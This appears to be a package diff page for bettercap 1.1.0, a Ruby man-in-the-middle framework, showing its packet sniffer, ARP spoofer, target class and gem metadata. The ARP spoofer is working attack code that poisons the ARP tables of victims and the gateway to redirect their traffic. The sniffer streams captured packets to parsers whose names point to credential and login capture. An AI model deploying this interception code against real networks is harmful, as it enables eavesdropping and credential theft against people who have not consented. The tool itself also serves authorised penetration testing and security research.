bettercap 1.1.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +7 -0
- data/LICENSE +225 -0
- data/README.md +96 -0
- data/bettercap.gemspec +28 -0
- data/bin/bettercap +184 -0
- data/example_proxy_module.rb +21 -0
- data/lib/bettercap/base/ifirewall.rb +28 -0
- data/lib/bettercap/base/ispoofer.rb +24 -0
- data/lib/bettercap/context.rb +124 -0
- data/lib/bettercap/discovery/arp.rb +37 -0
- data/lib/bettercap/discovery/icmp.rb +37 -0
- data/lib/bettercap/discovery/syn.rb +88 -0
- data/lib/bettercap/discovery/udp.rb +74 -0
- data/lib/bettercap/error.rb +16 -0
- data/lib/bettercap/factories/firewall_factory.rb +32 -0
- data/lib/bettercap/factories/parser_factory.rb +53 -0
- data/lib/bettercap/factories/spoofer_factory.rb +36 -0
- data/lib/bettercap/firewalls/linux.rb +55 -0
- data/lib/bettercap/firewalls/osx.rb +70 -0
- data/lib/bettercap/hw-prefixes +19651 -0
- data/lib/bettercap/logger.rb +53 -0
- data/lib/bettercap/monkey/packetfu/utils.rb +96 -0
- data/lib/bettercap/network.rb +131 -0
- data/lib/bettercap/proxy/module.rb +39 -0
- data/lib/bettercap/proxy/proxy.rb +262 -0
- data/lib/bettercap/proxy/request.rb +77 -0
- data/lib/bettercap/proxy/response.rb +76 -0
- data/lib/bettercap/shell.rb +31 -0
- data/lib/bettercap/sniffer/parsers/base.rb +31 -0
- data/lib/bettercap/sniffer/parsers/ftp.rb +19 -0
- data/lib/bettercap/sniffer/parsers/httpauth.rb +45 -0
- data/lib/bettercap/sniffer/parsers/https.rb +36 -0
- data/lib/bettercap/sniffer/parsers/irc.rb +19 -0
- data/lib/bettercap/sniffer/parsers/mail.rb +19 -0
- data/lib/bettercap/sniffer/parsers/ntlmss.rb +38 -0
- data/lib/bettercap/sniffer/parsers/post.rb +24 -0
- data/lib/bettercap/sniffer/parsers/url.rb +28 -0
- data/lib/bettercap/sniffer/sniffer.rb +39 -0
- data/lib/bettercap/spoofers/arp.rb +130 -0
- data/lib/bettercap/spoofers/none.rb +23 -0
- data/lib/bettercap/target.rb +52 -0
- data/lib/bettercap/version.rb +14 -0
- metadata +129 -0
@@ -0,0 +1,39 @@
|
|
1
|
+
=begin
|
2
|
+
|
3
|
+
BETTERCAP
|
4
|
+
|
5
|
+
Author : Simone 'evilsocket' Margaritelli
|
6
|
+
Email : evilsocket@gmail.com
|
7
|
+
Blog : http://www.evilsocket.net/
|
8
|
+
|
9
|
+
This project is released under the GPL 3 license.
|
10
|
+
|
11
|
+
=end
|
12
|
+
require 'bettercap/logger'
|
13
|
+
require 'bettercap/factories/parser_factory'
|
14
|
+
require 'colorize'
|
15
|
+
require 'packetfu'
|
16
|
+
|
17
|
+
class Sniffer
|
18
|
+
include PacketFu
|
19
|
+
|
20
|
+
@@parsers = nil
|
21
|
+
|
22
|
+
def self.start( ctx )
|
23
|
+
Logger.info 'Starting sniffer ...'
|
24
|
+
|
25
|
+
@@parsers = ParserFactory.load_by_names ctx.options[:parsers]
|
26
|
+
|
27
|
+
cap = Capture.new(:iface => ctx.options[:iface], :start => true)
|
28
|
+
cap.stream.each do |p|
|
29
|
+
pkt = Packet.parse p
|
30
|
+
if not pkt.nil? and pkt.is_ip?
|
31
|
+
next if ( pkt.ip_saddr == ctx.iface[:ip_saddr] or pkt.ip_daddr == ctx.iface[:ip_saddr] ) and !ctx.options[:local]
|
32
|
+
|
33
|
+
@@parsers.each do |parser|
|
34
|
+
parser.on_packet pkt
|
35
|
+
end
|
36
|
+
end
|
37
|
+
end
|
38
|
+
end
|
39
|
+
end
|
@@ -0,0 +1,130 @@
|
|
1
|
+
=begin
|
2
|
+
|
3
|
+
BETTERCAP
|
4
|
+
|
5
|
+
Author : Simone 'evilsocket' Margaritelli
|
6
|
+
Email : evilsocket@gmail.com
|
7
|
+
Blog : http://www.evilsocket.net/
|
8
|
+
|
9
|
+
This project is released under the GPL 3 license.
|
10
|
+
|
11
|
+
=end
|
12
|
+
require 'bettercap/error'
|
13
|
+
require 'bettercap/context'
|
14
|
+
require 'bettercap/base/ispoofer'
|
15
|
+
require 'bettercap/network'
|
16
|
+
require 'bettercap/logger'
|
17
|
+
require 'colorize'
|
18
|
+
|
19
|
+
class ArpSpoofer < ISpoofer
|
20
|
+
def initialize
|
21
|
+
@ctx = Context.get
|
22
|
+
@gw_hw = nil
|
23
|
+
@forwarding = @ctx.firewall.forwarding_enabled?
|
24
|
+
@spoof_thread = nil
|
25
|
+
@running = false
|
26
|
+
|
27
|
+
Logger.debug 'ARP SPOOFER SELECTED'
|
28
|
+
|
29
|
+
Logger.info "Getting gateway #{@ctx.gateway} MAC address ..."
|
30
|
+
@gw_hw = Network.get_hw_address( @ctx.iface, @ctx.gateway )
|
31
|
+
if @gw_hw.nil?
|
32
|
+
raise BetterCap::Error, "Couldn't determine router MAC"
|
33
|
+
end
|
34
|
+
|
35
|
+
Logger.info " Gateway MAC : #{@gw_hw}"
|
36
|
+
end
|
37
|
+
|
38
|
+
def send_spoofed_packed( saddr, smac, daddr, dmac )
|
39
|
+
pkt = PacketFu::ARPPacket.new
|
40
|
+
pkt.eth_saddr = smac
|
41
|
+
pkt.eth_daddr = dmac
|
42
|
+
pkt.arp_saddr_mac = smac
|
43
|
+
pkt.arp_daddr_mac = dmac
|
44
|
+
pkt.arp_saddr_ip = saddr
|
45
|
+
pkt.arp_daddr_ip = daddr
|
46
|
+
pkt.arp_opcode = 2
|
47
|
+
|
48
|
+
pkt.to_w(@ctx.iface[:iface])
|
49
|
+
end
|
50
|
+
|
51
|
+
def start
|
52
|
+
stop() unless @running == false
|
53
|
+
|
54
|
+
Logger.info 'Starting ARP spoofer ...'
|
55
|
+
|
56
|
+
if @forwarding == false
|
57
|
+
Logger.debug 'Enabling packet forwarding.'
|
58
|
+
|
59
|
+
@ctx.firewall.enable_forwarding(true)
|
60
|
+
end
|
61
|
+
|
62
|
+
@running = true
|
63
|
+
@spoof_thread = Thread.new do
|
64
|
+
prev_size = @ctx.targets.size
|
65
|
+
loop do
|
66
|
+
if not @running
|
67
|
+
Logger.debug 'Stopping spoofing thread ...'
|
68
|
+
Thread.exit
|
69
|
+
break
|
70
|
+
end
|
71
|
+
|
72
|
+
size = @ctx.targets.size
|
73
|
+
|
74
|
+
if size > prev_size
|
75
|
+
Logger.warn "Aquired #{size - prev_size} new targets."
|
76
|
+
elsif size < prev_size
|
77
|
+
Logger.warn "Lost #{prev_size - size} targets."
|
78
|
+
end
|
79
|
+
|
80
|
+
Logger.debug "Spoofing #{@ctx.targets.size} targets ..."
|
81
|
+
|
82
|
+
@ctx.targets.each do |target|
|
83
|
+
# targets could change, update mac addresses if needed
|
84
|
+
if target.mac.nil?
|
85
|
+
Logger.warn "Getting target #{target.ip} MAC address ..."
|
86
|
+
|
87
|
+
hw = Network.get_hw_address( @ctx.iface, target.ip, 1 )
|
88
|
+
if hw.nil?
|
89
|
+
Logger.warn "Couldn't determine target MAC"
|
90
|
+
next
|
91
|
+
else
|
92
|
+
Logger.info " Target MAC : #{hw}"
|
93
|
+
|
94
|
+
target.mac = hw
|
95
|
+
end
|
96
|
+
end
|
97
|
+
|
98
|
+
send_spoofed_packed @ctx.gateway, @ctx.iface[:eth_saddr], target.ip, target.mac
|
99
|
+
send_spoofed_packed target.ip, @ctx.iface[:eth_saddr], @ctx.gateway, @gw_hw
|
100
|
+
end
|
101
|
+
|
102
|
+
prev_size = @ctx.targets.size
|
103
|
+
|
104
|
+
sleep(1)
|
105
|
+
end
|
106
|
+
end
|
107
|
+
end
|
108
|
+
|
109
|
+
def stop
|
110
|
+
raise 'ARP spoofer is not running' unless @running
|
111
|
+
|
112
|
+
Logger.info 'Stopping ARP spoofer ...'
|
113
|
+
|
114
|
+
Logger.debug "Resetting packet forwarding to #{@forwarding} ..."
|
115
|
+
@ctx.firewall.enable_forwarding( @forwarding )
|
116
|
+
|
117
|
+
@running = false
|
118
|
+
@spoof_thread.join
|
119
|
+
|
120
|
+
Logger.info "Restoring ARP table of #{@ctx.targets.size} targets ..."
|
121
|
+
|
122
|
+
@ctx.targets.each do |target|
|
123
|
+
if !target.mac.nil?
|
124
|
+
send_spoofed_packed @ctx.gateway, @gw_hw, target.ip, target.mac
|
125
|
+
send_spoofed_packed target.ip, target.mac, @ctx.gateway, @gw_hw
|
126
|
+
end
|
127
|
+
end
|
128
|
+
sleep 1
|
129
|
+
end
|
130
|
+
end
|
@@ -0,0 +1,23 @@
|
|
1
|
+
=begin
|
2
|
+
|
3
|
+
BETTERCAP
|
4
|
+
|
5
|
+
Author : Simone 'evilsocket' Margaritelli
|
6
|
+
Email : evilsocket@gmail.com
|
7
|
+
Blog : http://www.evilsocket.net/
|
8
|
+
|
9
|
+
This project is released under the GPL 3 license.
|
10
|
+
|
11
|
+
=end
|
12
|
+
require 'bettercap/base/ispoofer'
|
13
|
+
require 'bettercap/logger'
|
14
|
+
|
15
|
+
class NoneSpoofer < ISpoofer
|
16
|
+
def initialize
|
17
|
+
Logger.warn 'Spoofing disabled.'
|
18
|
+
end
|
19
|
+
|
20
|
+
def start; end
|
21
|
+
|
22
|
+
def stop; end
|
23
|
+
end
|
@@ -0,0 +1,52 @@
|
|
1
|
+
=begin
|
2
|
+
|
3
|
+
BETTERCAP
|
4
|
+
|
5
|
+
Author : Simone 'evilsocket' Margaritelli
|
6
|
+
Email : evilsocket@gmail.com
|
7
|
+
Blog : http://www.evilsocket.net/
|
8
|
+
|
9
|
+
This project is released under the GPL 3 license.
|
10
|
+
|
11
|
+
=end
|
12
|
+
require 'bettercap/logger'
|
13
|
+
|
14
|
+
class Target
|
15
|
+
attr_accessor :ip, :mac, :vendor, :hostname
|
16
|
+
|
17
|
+
@@prefixes = nil
|
18
|
+
|
19
|
+
def initialize( ip, mac )
|
20
|
+
@ip = ip
|
21
|
+
@mac = mac
|
22
|
+
@vendor = Target.lookup_vendor(mac) if not mac.nil?
|
23
|
+
@hostname = nil # for future use
|
24
|
+
end
|
25
|
+
|
26
|
+
def mac=(value)
|
27
|
+
@mac = value
|
28
|
+
@vendor = Target.lookup_vendor(@mac) if not @mac.nil?
|
29
|
+
end
|
30
|
+
|
31
|
+
def to_s
|
32
|
+
"#{@ip} : #{@mac}" + ( @vendor ? " ( #{@vendor} )" : "" )
|
33
|
+
end
|
34
|
+
|
35
|
+
private
|
36
|
+
|
37
|
+
def self.lookup_vendor( mac )
|
38
|
+
if @@prefixes == nil
|
39
|
+
Logger.debug 'Preloading hardware vendor prefixes ...'
|
40
|
+
|
41
|
+
@@prefixes = {}
|
42
|
+
filename = File.dirname(__FILE__) + '/hw-prefixes'
|
43
|
+
File.open( filename ).each do |line|
|
44
|
+
if line =~ /^([A-F0-9]{6})\s(.+)$/
|
45
|
+
@@prefixes[$1] = $2
|
46
|
+
end
|
47
|
+
end
|
48
|
+
end
|
49
|
+
|
50
|
+
@@prefixes[ mac.split(':')[0,3].join('').upcase ]
|
51
|
+
end
|
52
|
+
end
|
metadata
ADDED
@@ -0,0 +1,129 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: bettercap
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: 1.1.0
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- Simone Margaritelli
|
8
|
+
autorequire:
|
9
|
+
bindir: bin
|
10
|
+
cert_chain: []
|
11
|
+
date: 2015-07-22 00:00:00.000000000 Z
|
12
|
+
dependencies:
|
13
|
+
- !ruby/object:Gem::Dependency
|
14
|
+
name: colorize
|
15
|
+
requirement: !ruby/object:Gem::Requirement
|
16
|
+
requirements:
|
17
|
+
- - ~>
|
18
|
+
- !ruby/object:Gem::Version
|
19
|
+
version: 0.7.5
|
20
|
+
type: :runtime
|
21
|
+
prerelease: false
|
22
|
+
version_requirements: !ruby/object:Gem::Requirement
|
23
|
+
requirements:
|
24
|
+
- - ~>
|
25
|
+
- !ruby/object:Gem::Version
|
26
|
+
version: 0.7.5
|
27
|
+
- !ruby/object:Gem::Dependency
|
28
|
+
name: packetfu
|
29
|
+
requirement: !ruby/object:Gem::Requirement
|
30
|
+
requirements:
|
31
|
+
- - ~>
|
32
|
+
- !ruby/object:Gem::Version
|
33
|
+
version: 1.1.10
|
34
|
+
type: :runtime
|
35
|
+
prerelease: false
|
36
|
+
version_requirements: !ruby/object:Gem::Requirement
|
37
|
+
requirements:
|
38
|
+
- - ~>
|
39
|
+
- !ruby/object:Gem::Version
|
40
|
+
version: 1.1.10
|
41
|
+
- !ruby/object:Gem::Dependency
|
42
|
+
name: pcaprub
|
43
|
+
requirement: !ruby/object:Gem::Requirement
|
44
|
+
requirements:
|
45
|
+
- - ~>
|
46
|
+
- !ruby/object:Gem::Version
|
47
|
+
version: 0.12.0
|
48
|
+
type: :runtime
|
49
|
+
prerelease: false
|
50
|
+
version_requirements: !ruby/object:Gem::Requirement
|
51
|
+
requirements:
|
52
|
+
- - ~>
|
53
|
+
- !ruby/object:Gem::Version
|
54
|
+
version: 0.12.0
|
55
|
+
description: A complete, modular, portable and easily extensible MITM framework.
|
56
|
+
email: evilsocket@gmail.com
|
57
|
+
executables:
|
58
|
+
- bettercap
|
59
|
+
extensions: []
|
60
|
+
extra_rdoc_files: []
|
61
|
+
files:
|
62
|
+
- lib/bettercap/base/ifirewall.rb
|
63
|
+
- lib/bettercap/base/ispoofer.rb
|
64
|
+
- lib/bettercap/context.rb
|
65
|
+
- lib/bettercap/discovery/arp.rb
|
66
|
+
- lib/bettercap/discovery/icmp.rb
|
67
|
+
- lib/bettercap/discovery/syn.rb
|
68
|
+
- lib/bettercap/discovery/udp.rb
|
69
|
+
- lib/bettercap/error.rb
|
70
|
+
- lib/bettercap/factories/firewall_factory.rb
|
71
|
+
- lib/bettercap/factories/parser_factory.rb
|
72
|
+
- lib/bettercap/factories/spoofer_factory.rb
|
73
|
+
- lib/bettercap/firewalls/linux.rb
|
74
|
+
- lib/bettercap/firewalls/osx.rb
|
75
|
+
- lib/bettercap/hw-prefixes
|
76
|
+
- lib/bettercap/logger.rb
|
77
|
+
- lib/bettercap/monkey/packetfu/utils.rb
|
78
|
+
- lib/bettercap/network.rb
|
79
|
+
- lib/bettercap/proxy/module.rb
|
80
|
+
- lib/bettercap/proxy/proxy.rb
|
81
|
+
- lib/bettercap/proxy/request.rb
|
82
|
+
- lib/bettercap/proxy/response.rb
|
83
|
+
- lib/bettercap/shell.rb
|
84
|
+
- lib/bettercap/sniffer/parsers/base.rb
|
85
|
+
- lib/bettercap/sniffer/parsers/ftp.rb
|
86
|
+
- lib/bettercap/sniffer/parsers/httpauth.rb
|
87
|
+
- lib/bettercap/sniffer/parsers/https.rb
|
88
|
+
- lib/bettercap/sniffer/parsers/irc.rb
|
89
|
+
- lib/bettercap/sniffer/parsers/mail.rb
|
90
|
+
- lib/bettercap/sniffer/parsers/ntlmss.rb
|
91
|
+
- lib/bettercap/sniffer/parsers/post.rb
|
92
|
+
- lib/bettercap/sniffer/parsers/url.rb
|
93
|
+
- lib/bettercap/sniffer/sniffer.rb
|
94
|
+
- lib/bettercap/spoofers/arp.rb
|
95
|
+
- lib/bettercap/spoofers/none.rb
|
96
|
+
- lib/bettercap/target.rb
|
97
|
+
- lib/bettercap/version.rb
|
98
|
+
- bin/bettercap
|
99
|
+
- LICENSE
|
100
|
+
- README.md
|
101
|
+
- bettercap.gemspec
|
102
|
+
- example_proxy_module.rb
|
103
|
+
homepage: http://github.com/evilsocket/bettercap
|
104
|
+
licenses:
|
105
|
+
- GPL3
|
106
|
+
metadata: {}
|
107
|
+
post_install_message:
|
108
|
+
rdoc_options:
|
109
|
+
- --charset=UTF-8
|
110
|
+
require_paths:
|
111
|
+
- lib
|
112
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
113
|
+
requirements:
|
114
|
+
- - '>='
|
115
|
+
- !ruby/object:Gem::Version
|
116
|
+
version: '0'
|
117
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
118
|
+
requirements:
|
119
|
+
- - '>='
|
120
|
+
- !ruby/object:Gem::Version
|
121
|
+
version: '0'
|
122
|
+
requirements: []
|
123
|
+
rubyforge_project:
|
124
|
+
rubygems_version: 2.0.14
|
125
|
+
signing_key:
|
126
|
+
specification_version: 4
|
127
|
+
summary: A complete, modular, portable and easily extensible MITM framework.
|
128
|
+
test_files: []
|
129
|
+
has_rdoc:
|